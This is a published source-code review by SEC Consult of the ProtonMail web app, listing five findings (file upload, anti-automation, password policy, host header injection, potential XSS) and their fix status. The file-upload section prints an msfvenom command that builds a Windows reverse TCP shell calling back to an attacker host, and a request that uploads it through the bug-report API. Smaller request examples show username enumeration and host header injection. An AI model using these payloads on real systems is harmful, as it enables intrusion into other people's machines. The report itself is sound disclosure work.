Report 1907974 Source Code Review ProtonMail Web App
for Proton Technologies AG
conducted by SEC Consult
Version: 1.2 | Date: 2019-12-03 Responsible: SEC Consult | Author: SEC Consult Confidentiality class: Public Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
Table of Contents
Table of Contents ...... 2 1 Management Summary ...... 3 1.1 Scope and Timetable ...... 3 1.2 Results ...... 4 1.3 Disclaimer ...... 4 2 Vulnerability Summary ...... 5 2.1 Total Risk Per System ...... 5 2.2 Risk of Each Vulnerability ...... 6 3 Detailed Analysis ...... 7 3.1 ProtonMail Web App ...... 7 3.1.1 General Information ...... 7 3.1.2 Whois Information ...... 7 3.1.3 Port Scan Results ...... 7 3.1.4 Arbitrary File Upload - ACCEPTED ...... 8 3.1.5 Missing anti-automation - FIXED ...... 10 3.1.6 Weak Password Policy - ACCEPTED ...... 14 3.1.7 Host Header Injection - FIXED ...... 15 3.1.8 Potential Cross-Site Scripting - FIXED ...... 17 4 Version History ...... 18
SEC Consult [email protected] | www.sec-consult.com Page 2 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
1 Management Summary
The following chapter summarizes the scope and timetable of the code review, the results of the code review, and outlines the measures recommended by SEC Consult.
1.1 Scope and Timetable
During the initial security assessment for Proton Technologies AG, SEC Consult performed a source code review of the ProtonMail Web App – a secure email web application accessible from the Internet, which offers easy-to-use email encryption by seamlessly integrating PGP end-to-end encryption. Objective of the review was to reveal security issues and to offer suggestions for improvement. The focus of the code review was to provide answers to the following questions: - Is an attacker able to break end-to-end encryption provided by ProtonMail solution? - Is an attacker able to access data of other customers (cross-tenant access)? - Is an attacker able to use paid ProtonMail features without an account upgrade? The initial review was conducted in Q1 2019 and a total effort of 6 days was dedicated to identifying and documenting security issues in the code base of the ProtonMail API. Version 3.16.3 of the application was tested. Full access to the source code was granted and test user credentials of the roles “free”, “plus”, “professional”, and “visionary” were provided. The following files and documents were made available in the course of the review:
Files SHA1 Sum
WebClient-public.zip d7469d174bf34885695f1f69bb2518c41722413c
In September 2019, Proton Technologies AG fixed the identified issues and supplied the fixes to SEC Consult for verification. Goal of the fix verification was to confirm remediation provided by the applied fixes. SEC Consult verified the fixes in October 2019.
SEC Consult [email protected] | www.sec-consult.com Page 3 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
1.2 Results
During the initial code review, SEC Consult found two medium-risk vulnerabilities and three low-risk vulnerabilities in the reviewed source code and the app.
User passwords do not comply with security standards which could lead to a hijacking of valid user accounts. However, because of deployed anti-automation this attack is not feasible.
Due to insufficient input validation an attacker can upload arbitrary files in the bug tracking system. However, it is not possible to execute the uploaded malicious samples, neither on the backend servers nor by other customers.
No issues have been identified that would allow an attacker to break ProtonMail’s end-to-end encryption or to access other customers’ data.
During the fix verification it was not possible for an attacker to use paid ProtonMail features without an account upgrade
All security issues that were identified in the initial code review were properly fixed or accepted by Proton Technologies AG.
1.3 Disclaimer
At the request of Proton Technology AG, this report has been declassified from strictly confidential to public. While the report was shortened for public release, relevant vulnerability information has been maintained. In this particular project, a timebox approach was used to define the consulting effort. This means that SEC Consult allotted a prearranged amount of time to identify and document vulnerabilities. Because of this, there is no guarantee that the project has discovered all possible vulnerabilities and risks. Furthermore, the security check is only an immediate evaluation of the situation at the time the check was performed. An evaluation of future security levels or possible future risks or vulnerabilities may not be derived from it.
SEC Consult [email protected] | www.sec-consult.com Page 4 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
2 Vulnerability Summary This chapter contains all identified vulnerabilities in the reviewed source code of the company Proton Technologies AG.
Initial no. of Current no. of Risk assessment vulnerability classes vulnerability classes
Low 3 0
Medium 2 0
High 0 0
Critical 0 0
Total 5 0
2.1 Total Risk Per System
The following table contains a risk assessment for each system which contained security flaws.
System Field of application Initial risk Current risk
ProtonMail Web App Web Medium -
Total - Medium -
SEC Consult [email protected] | www.sec-consult.com Page 5 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
2.2 Risk of Each Vulnerability
The following table contains a risk assessment for the discovered vulnerabilities.
Vulnerability System Initial risk Current risk Page
Arbitrary File Upload ProtonMail Web App Medium ACCEPTED 8
Missing anti-automation ProtonMail Web App Medium FIXED 10
Weak Password Policy ProtonMail Web App Low ACCEPTED 14
Host Header Injection ProtonMail Web App Low FIXED 15
Potential Cross-Site Scripting ProtonMail Web App Low FIXED 17
Total - Medium - -
SEC Consult [email protected] | www.sec-consult.com Page 6 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
3 Detailed Analysis
This chapter outlines the attacks and found vulnerabilities in detail. 3.1 ProtonMail Web App 3.1.1 General Information This section describes vulnerabilities found in the ProtonMail Web App. The web application mail.protonmail.com is running on the host with the IP address 185.70.40.151. The web application provides browser-based email client capabilities that allow ProtonMail users to utilize secure email communications. The web application frontend is based on AngularJS. 3.1.2 Whois Information Whois information is being gathered for all IP addresses in the permission to attack form to verify whether the given information is correct and that the IP addresses belong to the company being assessed. The following table represents the public whois information from a database which holds the owner of the domains/IP addresses. inetnum: 185.70.40.0 - 185.70.40.255 netname: protonmail-1 descr: Proton Technologies AG country: ch person: Sebastien Ceuterickx
address: Chemin du Pr�-Fleuri 3 address: CH-1228 Plan-les-Ouates address: SWITZERLAND phone: +41225483451
3.1.3 Port Scan Results
Port Number Protocol Service Version
80 TCP http -
443 TCP ssl/https -
Please be aware that the identification of services and versions might not be accurate in all cases.
SEC Consult [email protected] | www.sec-consult.com Page 7 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
3.1.4 Arbitrary File Upload - ACCEPTED
Uploading arbitrary files to the web server may cause severe security problems. File uploads in web applications are often used by attackers to upload server sided scripts, which are capable of executing commands with the rights of the web server. In this case, an attacker does not have the possibility to directly affect the integrity of the system, however it may be possible to affect the system of a user that downloads and executes such file locally. CVSS-v3 Base Score: 4.8 (Medium) CVSS-v3 Vector String: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3.1.4.1 Recheck results
The application allows to submit bug reports and attach screenshots. The client-side scripts properly validate that non-image files would not be allowed for upload. However, it is still possible to send non-image type files to the backend without any error. During the recheck the reverse TCP backdoor was generated using msfvenom tool: # msfvenom -p windows/shell_reverse_tcp LHOST=[attacker] LPORT=4444 > my_payload.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 324 bytes
Below is an HTTP POST request, which uploads the backdoor payload to the backend via a bug report functionality: POST /api/reports/bug HTTP/1.1 Host: mail.protonmail.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: application/vnd.protonmail.v1+json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://mail.protonmail.com/inbox x-pm-appversion: Web_3.16.3 x-pm-apiversion: 3 x-pm-uid: 8ebf36c0684da8accb1f025c3dfaf6a17152ffb8 Content-Type: multipart/form-data; boundary=------
SEC Consult [email protected] | www.sec-consult.com Page 8 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
14260440461244241949631847335 Content-Length: 76014 DNT: 1 Connection: close
------14260440461244241949631847335
[...]
------14260440461244241949631847335 Content-Disposition: form-data; name="my_payload.exe"; filename="my_payload.exe" Content-Type: application/x-ms-dos-executable
MZ•[binary content, reverse TCP shell for win32][...]
After the above request is submitted the backend responds in the same manner as with a legitimate image file, therefore it is assumed such malicious file has also been accepted: HTTP/1.1 200 OK Date: Thu, 05 Sep 2019 15:48:53 GMT X-Frame-Options: deny X-Content-Type-Options: nosniff […] Referrer-Policy: strict-origin-when-cross-origin
{"Code":1000}
Statement Proton Technologies AG: The reported upload route is for our bug tracking and customer support system. An uploaded file goes directly to a third-party support system, which is hosted separately to our actual product infrastructure. We consider this low risk because it is not the core infrastructure and we mitigate the human factor by training our support specialists to be vigilant about user submitted files.
SEC Consult [email protected] | www.sec-consult.com Page 9 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
3.1.5 Missing anti-automation - FIXED
If the application was designed to handle actions performed mainly by manual user interaction, it might be vulnerable to automation attacks. Application functionality that is often a target for automation attacks may include login, registration, comment and contact forms. In this case, an attacker can automatically generate a massive amount of bug reports. This may affect the backend database or cause issues in the supporting business processes. CVSS-v3 Base Score: 5.3 (Medium) CVSS-v3 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
3.1.5.1 Recheck results
Example 1. While creating a user account, the application checks for an existing username via the following HTTP request: GET /api/users/available?Name=tester HTTP/1.1 Host: mail.protonmail.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: application/vnd.protonmail.v1+json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://mail.protonmail.com/help/reset-login-password x-pm-appversion: Web_3.16.3 x-pm-apiversion: 3 Cache-Control: no-cache Pragma: no-cache DNT: 1 Connection: close Content-Length: 0
SEC Consult [email protected] | www.sec-consult.com Page 10 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
If a chosen username does not exist, the application returns the following response: HTTP/1.1 200 OK Date: Thu, 05 Sep 2019 15:00:48 GMT […]
{"Code":1000}
If it does exist, the application returns a different message: HTTP/1.1 409 Conflict Date: Thu, 05 Sep 2019 14:17:11 GMT […]
{"Code":12106,"Error":"Username already used","ErrorDescription":"","Details":{"Suggestions":["tester65","tester154" ,"tester936"]}}
However, during the fix verification, it was not possible to efficiently enumerate existing usernames. Around 50 requests to the username checking API endpoint were sent within a short timeframe (few seconds). Starting from 22nd request server started to decline further requests to the endpoint:
Figure 1. Anti-automation is in place.
SEC Consult [email protected] | www.sec-consult.com Page 11 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
Example 2. An unauthenticated user is able to submit bug reports via the following HTTP POST request: POST /api/reports/bug HTTP/1.1 Host: mail.protonmail.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: application/vnd.protonmail.v1+json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://mail.protonmail.com/inbox x-pm-appversion: Web_3.16.3¬¬¬ x-pm-apiversion: 3 x-pm-uid: 8ebf36c0684da8accb1f025c3dfaf6a17152ffb8 Content-Type: multipart/form-data; boundary=------14260440461244241949631847335 Content-Length: 76014 DNT: 1 Connection: close
------14260440461244241949631847335
[...]
------14260440461244241949631847335 Content-Disposition: form-data; name="Selection_655.png"; filename="Selection_655.png" Content-Type: image/png
�PNG [...] ------14260440461244241949631847335--
SEC Consult [email protected] | www.sec-consult.com Page 12 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
During the fix verification, multiple bug reports were submitted within a short timeframe. As it is seen from the screenshot below, after submitting the 15th bug report server started to decline further bug reports:
Figure 2. Anti-automation is in place.
SEC Consult [email protected] | www.sec-consult.com Page 13 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
3.1.6 Weak Password Policy - ACCEPTED
There is a weak password policy for the application users in place. Therefore, user passwords do not have to comply with security standards. This can expose these users to brute force and dictionary attacks against their passwords, which could lead to a hijacking of their accounts. CVSS-v3 Base Score: 3.7 (Low) CVSS-v3 Vector String: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
3.1.6.1 Recheck results
During the tests it was possible to change a user account password to the weakest one possible – i.e. one character long. No proof of concept is presented since the Secure Remote Password Protocol (SRP) is used during password change. However, to ensure the best level of security, a password policy should be implemented. Statement Proton Technologies AG: We deem this the responsibility of the user to choose a password of appropriate strength. Additionally, if password verification has to occur, it would have to happen client side as the ProtonMail API never sees the user's password. The final risk of this issue is low since mitigating measures such as the Secure Remote Password (SRP) protocol is used, also it is possible to enable 2FA, which increases the security of the account (assuming 2FA cannot be bypassed now or in the future).
SEC Consult [email protected] | www.sec-consult.com Page 14 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
3.1.7 Host Header Injection - FIXED
The web server that runs on TCP port 80 does not validate the value transferred via HTTP Host header, therefore it is possible to send HTTP requests with malicious Host header values. Depending on the infrastructure, application design and functionality such flaw can lead to an unauthorized URL redirect by cache poisoning, password reset attacks, or Cross-Site Scripting. CVSS-v3 Base Score: 3.1 (Low) CVSS-v3 Vector String: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
3.1.7.1 Recheck results
Like in the initial review, the following HTTP request with a malicious Host header value was sent to the web service running on host mail.protonmail.com TCP port 80: GET / HTTP/1.1 Host: www.sec-consult.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
The receiving server response shows that there is no redirection to the malicious location anymore: HTTP/1.1 301 Moved Permanently Content-length: 0 Location: https://mail.protonmail.com/ Connection: close
SEC Consult [email protected] | www.sec-consult.com Page 15 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
An equivalent HTTPS request with the same malicious ‘Host’ header value was sent to the web service running on host mail.protonmail.com on TCP port 443. The receiving server response shows that there is no redirection to the malicious location: HTTP/1.1 200 OK Date: Thu, 05 Sep 2019 10:57:41 GMT […]
[…]
SEC Consult [email protected] | www.sec-consult.com Page 16 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
3.1.8 Potential Cross-Site Scripting - FIXED
According to the source code, the application uses the module AngularJS Strict Contextual Escaping (SCE) together with the function ‘trustAsHtml’ to render the email body. This potentially allows to inject malicious JavaScript, which is trusted by the application and may lead to cross-site scripting. CVSS-v3 Base Score: 3.1 (Low) CVSS-v3 Vector String: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
3.1.8.1 Recheck results
The renderMessageBody.js function uses the method ‘$sce.trustAsHtml’, which explicitly trusts the provided HTML. The excerpt of the source code is provided below: Lines: 59-63 […] const unsubscribe = scope.$watch('body', () => { scope.$applyAsync(() => { el[0].innerHTML = $sce.getTrustedHtml($sce.trustAsHtml(scope.body)); }); }); […]
However, any input passed to trustAsHtml is sanitized beforehand using DOMPurify. This removes the potential for XSS.
SEC Consult [email protected] | www.sec-consult.com Page 17 of 18 Report 1907974 for Proton Technologies AG Source Code Review – ProtonMail Web App Responsible: SEC Consult Version/Date: 1.2 / 2019-12-03 Confidentiality class: Public
4 Version History
Version Date Status/Changes Created by Responsible
1.0 2019-03-15 Initial report SEC Consult SEC Consult
1.1 2019-10-10 Fix verification SEC Consult SEC Consult
1.2 2019-12-03 Public report SEC Consult SEC Consult
SEC Consult [email protected] | www.sec-consult.com Page 18 of 18